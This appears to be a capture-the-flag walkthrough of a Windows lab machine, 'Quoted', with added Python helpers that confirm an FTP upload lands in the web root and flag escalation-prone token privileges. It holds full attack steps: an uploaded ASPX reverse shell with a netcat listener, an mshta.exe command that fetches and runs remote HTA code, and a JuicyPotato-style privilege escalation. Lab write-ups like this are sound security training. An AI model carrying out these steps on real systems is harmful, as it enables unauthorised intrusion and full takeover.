Quoted

We will download the machine and configure its network as we did in DC01.
Enumeration:
The first thing we need is the IP of the target machine. First we check our own address and subnet with ifconfig; then, since the target is a Windows machine, we can find it with an SMB sweep of the subnet:
ifconfig
netexec smb 10.0.2.0/24

Now we will run an nmap scan against the host we found:
nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv -Pn 10.0.2.36

nmap reports that anonymous login is allowed on FTP, so let's authenticate to the FTP server as anonymous (any password is accepted):
ftp 10.0.2.36
anonymous

Let's check whether we can upload something here. Create a small test file locally:
echo "1" > test.txt

And upload it to the FTP server with the put command:
put test.txt

As we can see, we have write access to this FTP server.
Let's try to reach the file we uploaded through the browser, which tells us whether the FTP root is the same directory the web server serves from:

We can access it, so the FTP root is the web root: anything we upload over FTP is reachable over HTTP.
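The manual check above (upload over FTP, fetch over HTTP) is the one fact the rest of the attack depends on, so it is worth automating. The following is an added example written for this page, not code from the original write-up: it uploads a random marker over anonymous FTP, fetches it back over HTTP, compares the bytes and deletes the marker. The target address and the assumption that the web root is served at `http://10.0.2.36/` are taken from the write-up; the function names are this example's own.

```python
"""Confirm that an anonymous-writable FTP root is served by the web server:
upload a random marker over FTP, fetch it over HTTP, compare, clean up."""
import io
import secrets
from ftplib import FTP
from urllib.request import urlopen


def marker():
    """Random filename and content so the check cannot be confused with
    leftovers from earlier attempts (or another player's files)."""
    token = secrets.token_hex(8)
    return f"chk_{token}.txt", f"ftp-webroot-check {token}\n".encode()


def check_ftp_webroot(ftp, fetch):
    """Upload a marker with `ftp` (an ftplib.FTP-like object exposing
    storbinary/delete) and read it back with `fetch(path) -> bytes`
    (an HTTP GET that raises on errors such as 404).
    Returns True only when the body served over HTTP equals what we uploaded.
    The marker is always removed afterwards, even if the fetch fails."""
    name, body = marker()
    ftp.storbinary(f"STOR {name}", io.BytesIO(body))
    try:
        try:
            served = fetch(name)
        except Exception:
            # Not reachable over HTTP: the FTP root is not the web root.
            return False
        return served == body
    finally:
        try:
            ftp.delete(name)
        except Exception:
            pass  # no delete permission; nothing more we can do


def run(host="10.0.2.36", http_base="http://10.0.2.36/"):
    """Live check against the target (addresses assumed from the write-up)."""
    ftp = FTP(host, timeout=10)
    ftp.login()  # ftplib defaults to user 'anonymous'

    def fetch(path):
        with urlopen(http_base + path, timeout=10) as r:
            return r.read()

    try:
        return check_ftp_webroot(ftp, fetch)
    finally:
        ftp.quit()


if __name__ == "__main__":
    print("FTP root is the web root" if run() else "upload not served over HTTP")
```

Because `check_ftp_webroot` takes the FTP client and the HTTP fetcher as parameters, the same logic works for any FTP/HTTP pair and can be exercised without a live target. A positive result here is exactly what makes the next step possible: an uploaded `.aspx` file will be served, and executed, by the web server.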
Exploitation:
Since the web server executes ASPX, let's upload an ASPX file to get a reverse shell.
We will use the reverse shell from this website:
https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx

put shell.aspx

Set up a netcat listener (after editing the IP and port inside shell.aspx to point at our attacker machine and the listener port) and open the uploaded file in the browser:
rlwrap nc -nlvp 443


The browser request hangs: the page is blocked on the connection back to our listener, and on the listener side we receive the shell:

Post-Exploitation:
If we check our privileges:
whoami /priv

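Reading `whoami /priv` by eye is fine for one box, but the question it answers is always the same: does this token hold a privilege that leads straight to SYSTEM? The following is an added example for this page, not code from the original write-up. It parses the `whoami /priv` table and flags the privileges that matter for local privilege escalation; the mapping of privilege to attack is this example's own summary, and the sample output below is constructed, not captured from the Quoted machine.

```python
"""Flag token privileges in `whoami /priv` output that commonly lead to
SYSTEM (SeImpersonatePrivilege -> Potato-family attacks, and friends)."""
import re

# Privilege -> why it matters. Mapping assumed for this example; not exhaustive.
DANGEROUS_PRIVS = {
    "SeImpersonatePrivilege": "token impersonation (JuicyPotato, PrintSpoofer, GodPotato)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token (Potato-family attacks)",
    "SeDebugPrivilege": "open and inject into any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeTakeOwnershipPrivilege": "take ownership of arbitrary securable objects",
    "SeLoadDriverPrivilege": "load a (vulnerable) kernel driver",
}

# Constructed sample in the format `whoami /priv` prints on Windows.
SAMPLE_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, then the State column.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privs(output):
    """Return {privilege_name: state} parsed from `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def dangerous_privs(output):
    """Return [(name, state, reason)] for every privilege in DANGEROUS_PRIVS.
    A 'Disabled' privilege is still reported: the token holds it, and a
    process can enable it itself with AdjustTokenPrivileges, so it is just
    as exploitable as an 'Enabled' one."""
    found = []
    for name, state in parse_privs(output).items():
        if name in DANGEROUS_PRIVS:
            found.append((name, state, DANGEROUS_PRIVS[name]))
    return found


if __name__ == "__main__":
    for name, state, why in dangerous_privs(SAMPLE_OUTPUT):
        print(f"[!] {name} ({state}): {why}")
```

On the constructed sample this reports both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, which is the typical token of an IIS application pool or a service account, and exactly the situation the next step exploits.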
We will see that we have SeImpersonatePrivilege, which is the privilege abused by the Potato family of attacks. We will use Metasploit to escalate, so first we need a Meterpreter session; the hta_server module gives us one:
search hta_server

Configure the options:

Run it:
exploit

Now let's get a Meterpreter shell by running the generated HTA from our existing reverse shell:
mshta.exe http://10.0.2.35:8080/6vUn5uGTkLnGPc.hta


From the Meterpreter session, let's search for local exploits with the exploit suggester:
search suggester


Metasploit shows several local exploits we can try:

We will use the reflection juicy one (ms16_075_reflection_juicy, the JuicyPotato-style module that abuses SeImpersonatePrivilege):


And here is the root flag; the user flag can be found on the quoted user's Desktop.